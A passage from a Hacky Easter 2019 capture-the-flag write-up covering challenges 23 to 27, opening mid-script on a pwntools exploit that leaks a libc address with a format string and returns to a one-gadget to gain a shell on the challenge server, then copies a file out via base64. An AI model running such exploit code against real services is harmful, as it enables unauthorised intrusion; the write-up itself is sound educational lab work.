&#039;(%10$p)&#039;) # name: leak libc address\np.sendlineafter(&#039;&gt;&#039;, &#039;3&#039;)       # play\np.sendlineafter(&#039;&gt;&#039;, &#039;whoami&#039;)  # whoami\nleak = p.recvuntil(&#039;&gt;&#039;)\nx = re.search(&#039;\\((.*)\\)&#039;, leak)\nlibc_leak = int(x.group()&#x5B;1:-1], 16)\nlibc_base = libc_leak - stdout_offset\nlog.success(&#039;libc base: &#039; + hex(libc_base))\nlog.info(&#039;solving maze now ...&#039;)\n\nheading = 0 # 0=north, 1=west, 2=south, 3=east\ncur = heading\nkey = &#039;&#039;\n\nwhile True:\n  p.sendline(getCmd(cur))\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  #print(ret)\n  #print(getCmd(cur))\n  #if (key != &#039;&#039;): print(&#039;key: &#039; + key)\n  if (&#039;There is a wall!&#039; in ret):\n    if (cur == heading): heading = (heading - 1 ) % 4\n    cur = heading\n  else:\n    heading = cur\n    cur = (heading + 1) % 4\n\n  p.sendline(&#039;search&#039;)\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a key!&#039; in ret):\n    p.sendline(&#039;pick up&#039;)\n    p.recvuntil(&#039;You pick up the key: &#039;)\n    key = p.recv(32)\n    p.recvuntil(&#039;&gt;&#039;)\n    log.success(&#039;found key: &#039; + key)\n  if (&#039;You found a locked chest!&#039; in ret and key == &#039;&#039;):\n    log.info(&#039;found chest! sending exploit ...&#039;)\n    p.sendline(&#039;open&#039;)\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key + p64(libc_base + oneg2))\n    p.sendline(&#039;&#039;)  # enter -&gt; main menu\n    p.sendline(&#039;0&#039;) # 0 -&gt; trigger one gadget\n    p.recv(10000)\n    p.recv(10000)\n    p.recv(10000)\n    p.interactive()\n<\/pre><\/div>\n<br\/>I was quite lucky, since the second one gadget (offset <code>0x4526a<\/code>) in the first libc version I tried (<code>libc6_2.23-0ubuntu10_amd64.so<\/code>) worked immediately.\n<br\/>\n<br\/>Running the script yields a shell on the server:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/exploit.py\n&#x5B;+] Opening connection to whale.hacking-lab.com on port 7331: Done\n&#x5B;+] libc base: 0x7f56eb32c000\n&#x5B;*] solving maze now ...\n&#x5B;+] found key: ac85228aa5fea80c85e7213136d8a3c5\n&#x5B;*] found chest! sending exploit ...\n&#x5B;*] Switching to interactive mode\n$ id\nuid=1000(maze) gid=1000(maze) groups=1000(maze)\n$ ls -al\ndrwxr-xr-x.  21 root root 4096 Apr 16 07:11 .\ndrwxr-xr-x.  21 root root 4096 Apr 16 07:11 ..\n-rwxr-xr-x.   1 root root    0 Apr 16 07:11 .dockerenv\ndrwxr-xr-x.   2 root root 4096 Jan  5 12:47 bin\ndrwxr-xr-x.   2 root root    6 Apr 12  2016 boot\ndrwxr-xr-x.   5 root root  360 Apr 16 07:11 dev\n-rw-r--r--.   1 root root  947 Mar 27 12:50 egg.txt\ndrwxr-xr-x.  53 root root 4096 Apr 16 07:11 etc\ndrwxr-xr-x.   3 root root   17 Feb 16 08:20 home\ndrwxr-xr-x.   9 root root 4096 Jan  5 12:47 lib\ndrwxr-xr-x.   2 root root   33 Jan 23  2018 lib64\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 media\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 mnt\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 opt\ndr-xr-xr-x. 510 root root    0 Apr 16 07:11 proc\ndrwx------.   4 root root   64 Mar 27 14:08 root\ndrwxr-xr-x.   5 root root   74 Jan  5 12:47 run\ndrwxr-xr-x.   2 root root 4096 Jan  5 12:47 sbin\ndrwxr-xr-x.   2 root root    6 Jan 23  2018 srv\ndr-xr-xr-x.  13 root root    0 Apr 16 07:08 sys\ndrwxrwxrwt.   2 root root   37 May 10 10:50 tmp\ndrwxr-xr-x.  10 root root   97 Jan 23  2018 usr\ndrwxr-xr-x.  11 root root 4096 Jan 23  2018 var\n$ cd home\n$ ls -al\ntotal 4\ndrwxr-xr-x.  3 root root   17 Feb 16 08:20 .\ndrwxr-xr-x. 21 root root 4096 Apr 16 07:11 ..\ndrwxr-xr-x.  2 root maze   79 Mar 27 12:52 maze\n$ cd maze\n$ ls -al\ntotal 100\ndrwxr-xr-x. 2 root maze    79 Mar 27 12:52 .\ndrwxr-xr-x. 3 root root    17 Feb 16 08:20 ..\n-rw-r--r--. 1 root maze   220 Aug 31  2015 .bash_logout\n-rw-r--r--. 1 root maze  3771 Aug 31  2015 .bashrc\n-rw-r--r--. 1 root maze   655 May 16  2017 .profile\n-rwxr-xr-x. 1 root root 69877 Mar 27 12:51 egg.png\n-rwxr-xr-x. 1 root root 14880 Mar 27 10:44 maze\n\n<\/pre><\/div>\n<br\/>As we can see, the folder <code>\/home\/maze<\/code> contains a file called <code>egg.png<\/code>. Let&#8217;s simply transfer this on our own machine using base64 and copy&#038;paste:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n$ cat egg.png | base64 -w0\niVBORw0KGgoAAAANSUhEUgAAAeAAAAHgCAYAAAB91L6VAAAABGdBTUEAA...\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# echo &#039;iVBORw0KGgoAAAANSUhEUgAAAeAAAAHgCAYAAAB91L6VAAAABGdBTUEAA...&#039; | base64 -d &gt; egg23.png\n<\/pre><\/div>\n<br\/>Finally a QR code that makes sense \ud83d\ude42\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-71XJ-G5CM-sa6f-mRFa<\/span>.\n<br\/>\n<h1 id=\"chlg24\">24 &#8211; CAPTEG<\/h1>\nIn contrary to a lot of challenges where you have to dig in deep in order to understand, what needs to be done exactly, the objective of this challenge was straight forward: count eggs and submit the appropriate amount.\n<br\/>\n<br\/>Sounds not too hard, but the problem is, that you have only got 7 seconds and have to pass 42 rounds:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg24_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>At first I tried different approaches to solve this with an own implementation: searching for RGB patterns, comparing RGB values, fuzzy hashing with a precalculated database, &#8230;\n<br\/>\n<br\/>Though, I only reached a success rate of about 80%. This would mean, that the chance to survive 42 rounds is <code>0.8^42<\/code>, which are approximately <code>0.0085071%<\/code>. Not very satisfying.\n<br\/>\n<br\/>Thus I reluctantly decided to use <a href=\"https:\/\/www.tensorflow.org\/\" target=\"_new\" rel=\"noopener noreferrer\">TensorFlow<\/a> and followed <a href=\"https:\/\/pythonprogramming.net\/introduction-use-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">this very great tutorial<\/a>. Also <a href=\"https:\/\/tensorflow-object-detection-api-tutorial.readthedocs.io\/en\/latest\/index.html\" target=\"_new\" rel=\"noopener noreferrer\">the following page<\/a> contains useful information.\n<br\/>\n<br\/>The mentioned tutorial explains the necessary steps in great detail. At first we have to collect a fair amount of sample images and annotate them (designate where on the image the eggs are).\n<br\/>\n<br\/>In order to do this, I used <a href=\"https:\/\/github.com\/tzutalin\/labelImg\" target=\"_new\" rel=\"noopener noreferrer\">labelImg<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg24_02.png\" width=\"900\"\/>\n<br\/>\n<br\/>I annotated a total of 32 images. The output of <code>labelImg<\/code> must be converted before the further processing. These steps are also described in the <a href=\"https:\/\/pythonprogramming.net\/creating-tfrecord-files-tensorflow-object-detection-api-tutorial\/?completed=\/custom-objects-tracking-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">mentioned tutorial<\/a>.\n<br\/>\n<br\/>The next step is to separate the images into test data and train data and start training the model (described <a href=\"https:\/\/pythonprogramming.net\/training-custom-objects-tensorflow-object-detection-api-tutorial\/?completed=\/creating-tfrecord-files-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<br\/>\n<br\/>I trained the model for about 24 hours. After the training is done, the interference graph needs to be exported and the sample python script of the tutorial needs to be adjusted a little bit (see <a href=\"https:\/\/pythonprogramming.net\/testing-custom-object-detector-tensorflow-object-detection-api-tutorial\/?completed=\/training-custom-objects-tensorflow-object-detection-api-tutorial\/\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<br\/>\n<br\/>At first I tried to do the detection on the whole image containing all nine squares, but the accuracy rate was not satisfying. So I split the image into smaller images only containing two squares. This raised the accuracy rate considerably.\n<br\/>\n<br\/>The only thing left to do is to add a few lines in the sample script in order to retrieve the images and submit the amount of counted eggs:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\n\nfrom distutils.version import StrictVersion\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n# This is needed since the notebook is stored in the object_detection folder.\nsys.path.append(&quot;..&quot;)\nsys.path.append(&#039;\/opt\/tensorflow\/models&#039;) # point to your tensorflow dir\nsys.path.append(&#039;\/opt\/tensorflow\/models\/research\/object_detection&#039;) # point to your tensorflow dir\nsys.path.append(&#039;\/opt\/tensorflow\/models\/slim&#039;) # point ot your slim dir\n\nfrom object_detection.utils import ops as utils_ops\n\nif StrictVersion(tf.__version__) &lt; StrictVersion(&#039;1.12.0&#039;):\n  raise ImportError(&#039;Please upgrade your TensorFlow installation to v1.12.*.&#039;)\n\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\nimport requests\nfrom PIL import Image\nimport time\n\n# What model to download.\nMODEL_NAME = &#039;eggs_graph2&#039;\nMODEL_FILE = MODEL_NAME + &#039;.tar.gz&#039;\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_FROZEN_GRAPH = &#039;\/opt\/tensorflow\/models\/research\/object_detection\/&#039;+ MODEL_NAME + &#039;\/frozen_inference_graph.pb&#039;\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join(&#039;\/root\/Documents\/he19\/egg24\/train\/training&#039;, &#039;object-detection.pbtxt&#039;)\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n  od_graph_def = tf.GraphDef()\n  with tf.gfile.GFile(PATH_TO_FROZEN_GRAPH, &#039;rb&#039;) as fid:\n    serialized_graph = fid.read()\n    od_graph_def.ParseFromString(serialized_graph)\n    tf.import_graph_def(od_graph_def, name=&#039;&#039;)\n\ncategory_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)\n\ndef load_image_into_numpy_array(image):\n  (im_width, im_height) = image.size\n  return np.array(image.getdata()).reshape(\n      (im_height, im_width, 3)).astype(np.uint8)\n\n\n# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.\nPATH_TO_TEST_IMAGES_DIR = &#039;test_images&#039;\nTEST_IMAGE_PATHS = &#x5B; os.path.join(PATH_TO_TEST_IMAGES_DIR, &#039;image{}.jpg&#039;.format(i)) for i in range(1, 2) ]\n\n# Size, in inches, of the output images.\nIMAGE_SIZE = (12, 8)\n\ndef run_inference_for_single_image(image, graph):\n  with graph.as_default():\n    with tf.Session() as sess:\n      # Get handles to input and output tensors\n      ops = tf.get_default_graph().get_operations()\n      all_tensor_names = {output.name for op in ops for output in op.outputs}\n      tensor_dict = {}\n      for key in &#x5B;\n          &#039;num_detections&#039;, &#039;detection_boxes&#039;, &#039;detection_scores&#039;,\n          &#039;detection_classes&#039;, &#039;detection_masks&#039;\n      ]:\n        tensor_name = key + &#039;:0&#039;\n        if tensor_name in all_tensor_names:\n          tensor_dict&#x5B;key] = tf.get_default_graph().get_tensor_by_name(\n              tensor_name)\n      if &#039;detection_masks&#039; in tensor_dict:\n        # The following processing is only for single image\n        detection_boxes = tf.squeeze(tensor_dict&#x5B;&#039;detection_boxes&#039;], &#x5B;0])\n        detection_masks = tf.squeeze(tensor_dict&#x5B;&#039;detection_masks&#039;], &#x5B;0])\n        # Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.\n        real_num_detection = tf.cast(tensor_dict&#x5B;&#039;num_detections&#039;]&#x5B;0], tf.int32)\n        detection_boxes = tf.slice(detection_boxes, &#x5B;0, 0], &#x5B;real_num_detection, -1])\n        detection_masks = tf.slice(detection_masks, &#x5B;0, 0, 0], &#x5B;real_num_detection, -1, -1])\n        detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(\n            detection_masks, detection_boxes, image.shape&#x5B;1], image.shape&#x5B;2])\n        detection_masks_reframed = tf.cast(\n            tf.greater(detection_masks_reframed, 0.5), tf.uint8)\n        # Follow the convention by adding back the batch dimension\n        tensor_dict&#x5B;&#039;detection_masks&#039;] = tf.expand_dims(\n            detection_masks_reframed, 0)\n      image_tensor = tf.get_default_graph().get_tensor_by_name(&#039;image_tensor:0&#039;)\n\n      # Run inference\n      output_dict = sess.run(tensor_dict,\n                             feed_dict={image_tensor: image})\n\n      # all outputs are float32 numpy arrays, so convert types as appropriate\n      output_dict&#x5B;&#039;num_detections&#039;] = int(output_dict&#x5B;&#039;num_detections&#039;]&#x5B;0])\n      output_dict&#x5B;&#039;detection_classes&#039;] = output_dict&#x5B;\n          &#039;detection_classes&#039;]&#x5B;0].astype(np.int64)\n      output_dict&#x5B;&#039;detection_boxes&#039;] = output_dict&#x5B;&#039;detection_boxes&#039;]&#x5B;0]\n      output_dict&#x5B;&#039;detection_scores&#039;] = output_dict&#x5B;&#039;detection_scores&#039;]&#x5B;0]\n      if &#039;detection_masks&#039; in output_dict:\n        output_dict&#x5B;&#039;detection_masks&#039;] = output_dict&#x5B;&#039;detection_masks&#039;]&#x5B;0]\n  return output_dict\n\ndef countEggs(image, out_file):\n  # the array based representation of the image will be used later in order to prepare the\n  # result image with boxes and labels on it.\n  image_np = load_image_into_numpy_array(image)\n  # Expand dimensions since the model expects images to have shape: &#x5B;1, None, None, 3]\n  image_np_expanded = np.expand_dims(image_np, axis=0)\n  # Actual detection.\n  output_dict = run_inference_for_single_image(image_np_expanded, detection_graph)\n  # Visualization of the results of a detection.\n  if (len(out_file) &gt; 0):\n    vis_util.visualize_boxes_and_labels_on_image_array(\n      image_np,\n      output_dict&#x5B;&#039;detection_boxes&#039;],\n      output_dict&#x5B;&#039;detection_classes&#039;],\n      output_dict&#x5B;&#039;detection_scores&#039;],\n      category_index,\n      instance_masks=output_dict.get(&#039;detection_masks&#039;),\n      use_normalized_coordinates=True,\n      min_score_thresh=.1,\n      line_thickness=4)\n    plt.figure(figsize=IMAGE_SIZE)\n    plt.imshow(image_np)\n    plt.savefig(out_file)\n\n  x = 0\n  i = 0\n  for score in output_dict&#x5B;&#039;detection_scores&#039;]:\n    if (score &gt; 0.5):\n      if(output_dict&#x5B;&#039;detection_classes&#039;]&#x5B;i] != 1): print(&#039;OIASDAS&#039;)\n      x += 1\n    i += 1\n\n  return x\n\n\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++\n# Entry Point\n\ns = requests.Session()\n\nwhile True:\n  s.get(&#039;http:\/\/whale.hacking-lab.com:3555\/&#039;)\n  pic = s.get(&#039;http:\/\/whale.hacking-lab.com:3555\/picture&#039;)\n  f = open(&#039;pic_tmp.jpg&#039;, &#039;w&#039;)\n  f.write(pic.content)\n  f.close()\n\n  im = Image.open(&#039;pic_tmp.jpg&#039;)\n  pix = im.load()\n\n  eggCount = 0\n  picCnt = 0\n  tmp = &#x5B;]\n\n  # split image\n  for i in range(3):\n    for j in range(3):\n      for w in range(300):\n        for h in range(300):\n          tmp.append(pix&#x5B;i*310+h,j*310+w])\n\n      picCnt += 1\n      if (picCnt%2 == 0 or picCnt == 9):\n        picId = picCnt\/2\n        if (picCnt == 9): picId = 5\n        outImg = Image.new(&#039;RGB&#039;, (300, 600))\n        outImg.putdata(tmp)\n        tmp = &#x5B;]\n        eggCount += countEggs(outImg, &#039;&#039;)\n\n  r = s.post(&#039;http:\/\/whale.hacking-lab.com:3555\/verify&#039;, data={&#039;s&#039;:str(eggCount)})\n  resp = r.text\n  print(resp)\n  if (&#039;Wrong solution&#039; in resp): continue\n<\/pre><\/div>\n<br\/>Running the script yields the flag after 42 successful rounds:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg24\/yet_again_tensor# cat sol.txt\nroot@kali:~\/Documents\/he19\/egg24\/yet_again_tensor# python splitOwn.py\n\/opt\/tensorflow\/models\/research\/object_detection\/utils\/visualization_utils.py:26: UserWarning:\nThis call to matplotlib.use() has no effect because the backend has already\nbeen chosen; matplotlib.use() must be called *before* pylab, matplotlib.pyplot,\nor matplotlib.backends is imported for the first time.\n\nThe backend was *originally* set to &#039;TkAgg&#039; by the following code:\n  File &quot;splitOwn.py&quot;, line 12, in &lt;module&gt;\n    from matplotlib import pyplot as plt\n  File &quot;\/usr\/lib\/python2.7\/dist-packages\/matplotlib\/pyplot.py&quot;, line 71, in &lt;module&gt;\n    from matplotlib.backends import pylab_setup\n  File &quot;\/usr\/lib\/python2.7\/dist-packages\/matplotlib\/backends\/__init__.py&quot;, line 16, in &lt;module&gt;\n    line for line in traceback.format_stack()\n\n\n  import matplotlib; matplotlib.use(&#039;Agg&#039;)  # pylint: disable=multiple-statements\n2019-05-06 04:43:23.902596: I tensorflow\/core\/platform\/cpu_feature_guard.cc:141] Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2\n2019-05-06 04:43:23.918183: I tensorflow\/core\/platform\/profile_utils\/cpu_utils.cc:94] CPU Frequency: 2207995000 Hz\n2019-05-06 04:43:23.918297: I tensorflow\/compiler\/xla\/service\/service.cc:150] XLA service 0x55ba775afa80 executing computations on platform Host. Devices:\n2019-05-06 04:43:23.918339: I tensorflow\/compiler\/xla\/service\/service.cc:158]   StreamExecutor device (0): &lt;undefined&gt;, &lt;undefined&gt;\nGreat success. Round 1 solved.\nGreat success. Round 2 solved.\nGreat success. Round 3 solved.\nGreat success. Round 4 solved.\nGreat success. Round 5 solved.\nGreat success. Round 6 solved.\nGreat success. Round 7 solved.\nGreat success. Round 8 solved.\nGreat success. Round 9 solved.\nGreat success. Round 10 solved.\nGreat success. Round 11 solved.\nGreat success. Round 12 solved.\nGreat success. Round 13 solved.\nGreat success. Round 14 solved.\nGreat success. Round 15 solved.\nGreat success. Round 16 solved.\nGreat success. Round 17 solved.\nGreat success. Round 18 solved.\nGreat success. Round 19 solved.\nGreat success. Round 20 solved.\nGreat success. Round 21 solved.\nGreat success. Round 22 solved.\nGreat success. Round 23 solved.\nGreat success. Round 24 solved.\nGreat success. Round 25 solved.\nGreat success. Round 26 solved.\nGreat success. Round 27 solved.\nGreat success. Round 28 solved.\nGreat success. Round 29 solved.\nGreat success. Round 30 solved.\nGreat success. Round 31 solved.\nGreat success. Round 32 solved.\nGreat success. Round 33 solved.\nGreat success. Round 34 solved.\nGreat success. Round 35 solved.\nGreat success. Round 36 solved.\nGreat success. Round 37 solved.\nGreat success. Round 38 solved.\nGreat success. Round 39 solved.\nGreat success. Round 40 solved.\nGreat success. Round 41 solved.\nhe19-s7Jj-mO4C-rP13-ySsJ\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-s7Jj-mO4C-rP13-ySsJ<\/span>.\n<br\/>\n<h1 id=\"chlg25\">25 &#8211; Hidden Egg #1<\/h1>\nThe challenge description suggests that the egg is hidden in a basket.\n<br\/>\n<br\/>After logging in and selecting <code>Eggs<\/code> in the menu, we can see the image of an egg basket on the right-hand side:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg25_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>Let&#8217;s download the image using <code>wget<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg25# wget https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/flags.jpg\n--2019-05-28 00:28:26--  https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/flags.jpg\nResolving hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)... 80.74.140.117\nConnecting to hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)|80.74.140.117|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 25413 (25K) &#x5B;image\/jpeg]\nSaving to: \u2018flags.jpg\u2019\n\nflags.jpg                             100%&#x5B;=========================================================================&gt;]  24.82K  --.-KB\/s    in 0.02s\n\n2019-05-28 00:28:27 (1.35 MB\/s) - \u2018flags.jpg\u2019 saved &#x5B;25413\/25413]\n<\/pre><\/div>\n<br\/>Now we can inspect the metadata of the image by using <code>exiftool<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg25# exiftool flags.jpg\nExifTool Version Number         : 11.16\nFile Name                       : flags.jpg\nDirectory                       : .\nFile Size                       : 25 kB\nFile Modification Date\/Time     : 2019:04:04 09:56:52-04:00\nFile Access Date\/Time           : 2019:05:28 00:28:27-04:00\nFile Inode Change Date\/Time     : 2019:05:28 00:28:27-04:00\nFile Permissions                : rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nExif Byte Order                 : Big-endian (Motorola, MM)\nPhotometric Interpretation      : RGB\nImage Description               : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nSamples Per Pixel               : 3\nX Resolution                    : 72\nY Resolution                    : 72\nResolution Unit                 : inches\nSoftware                        : paint.net 4.1.4\nModify Date                     : 2017:11:29 10:31:26\nArtist                          : Thumper\nExif Version                    : 0221\nExif Image Width                : 732\nExif Image Height               : 458\nXP Title                        : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nXP Author                       : Thumper\nXP Subject                      : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nPadding                         : (Binary data 1552 bytes, use -b option to extract)\nProfile CMM Type                : Linotronic\nProfile Version                 : 2.1.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 1998:02:09 06:49:00\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Hewlett-Packard\nDevice Model                    : sRGB\nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Hewlett-Packard\nProfile ID                      : 0\nProfile Copyright               : Copyright (c) 1998 Hewlett-Packard Company\nProfile Description             : sRGB IEC61966-2.1\nMedia White Point               : 0.95045 1 1.08905\nMedia Black Point               : 0 0 0\nRed Matrix Column               : 0.43607 0.22249 0.01392\nGreen Matrix Column             : 0.38515 0.71687 0.09708\nBlue Matrix Column              : 0.14307 0.06061 0.7141\nDevice Mfg Desc                 : IEC http:\/\/www.iec.ch\nDevice Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB\nViewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1\nViewing Cond Illuminant         : 19.6445 20.3718 16.8089\nViewing Cond Surround           : 3.92889 4.07439 3.36179\nViewing Cond Illuminant Type    : D50\nLuminance                       : 76.03647 80 87.12462\nMeasurement Observer            : CIE 1931\nMeasurement Backing             : 0 0 0\nMeasurement Geometry            : Unknown\nMeasurement Flare               : 0.999%\nMeasurement Illuminant          : D65\nTechnology                      : Cathode Ray Tube Display\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nAbout                           : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b\nTitle                           : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nDescription                     : https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png\nCreator                         : Thumper\nImage Width                     : 732\nImage Height                    : 458\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 732x458\nMegapixels                      : 0.335\n<\/pre><\/div>\n<br\/>Several fields (<code>Image Description<\/code>, <code>XP Title<\/code>, &#8230;) contain the URL <code>https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/f8f87dfe67753457dfee34648860dfe786.png<\/code>.\n<br\/>\n<br\/>Accessing this URL reveals that this is actually the hidden egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg25_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-xzCc-xElf-qJ4H-jay8<\/span>.\n<br\/>\n<h1 id=\"chlg26\">26 &#8211; Hidden Egg #2<\/h1>\nThe challenge description states that <i>a stylish blue egg is hidden somewhere on the webserver<\/i>.\n<br\/>\n<br\/>The word <code>stylish<\/code> is probably a hint, that the egg is hidden within a <code>stylesheet<\/code>.\n<br\/>\n<br\/>Thus we should start by digging through the <code>.css<\/code> files loaded by the website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg26_01.png\" width=\"1200\"\/>\n<br\/>\n<br\/>The end of the file <code>https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/css\/source-sans-pro.css<\/code> contains the following lines:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: css; gutter: false; title: ; notranslate\" title=\"\">\n...\n@font-face {\n    font-family: &#039;Egg26&#039;;\n    font-weight: 400;\n    font-style: normal;\n    font-stretch: normal;\n    src: local(&#039;Egg26&#039;),\n    local(&#039;Egg26&#039;),\n    url(&#039;..\/fonts\/TTF\/Egg26.ttf&#039;) format(&#039;truetype&#039;);\n}\n\n<\/pre><\/div>\n<br\/>So let&#8217;s download the file <code>Egg26.ttf<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# wget https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/fonts\/TTF\/Egg26.ttf\n--2019-05-28 00:42:07--  https:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/fonts\/TTF\/Egg26.ttf\nResolving hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)... 80.74.140.117\nConnecting to hackyeaster.hacking-lab.com (hackyeaster.hacking-lab.com)|80.74.140.117|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 69562 (68K) &#x5B;application\/x-font-ttf]\nSaving to: \u2018Egg26.ttf\u2019\n\nEgg26.ttf                             100%&#x5B;=========================================================================&gt;]  67.93K  --.-KB\/s    in 0.04s\n\n2019-05-28 00:42:07 (1.85 MB\/s) - \u2018Egg26.ttf\u2019 saved &#x5B;69562\/69562]\n\n<\/pre><\/div>\n<br\/>Using the <code>file<\/code> tool, we can see that this is not a font but an image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# file Egg26.ttf\nEgg26.ttf: PNG image data, 480 x 480, 8-bit\/color RGBA, non-interlaced\n<\/pre><\/div>\n<br\/>By renaming and opening the file, we can confirm that this is actually the hidden egg:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg26# mv Egg26.ttf egg26.png\n<\/pre><\/div>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg26_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-CuSV-SNEu-McPd-7eEg<\/span>.\n<br\/>\n<h1 id=\"chlg27\">27 &#8211; Hidden Egg #3<\/h1>\nThe challenge description states, that <i>sometimes, there is a hidden bonus level<\/i>.\n<br\/>\n<br\/>Comparing the image of the challenge:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg27_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>to the images of the challenges from <a href=\"#chlg21\">egg21<\/a> and <a 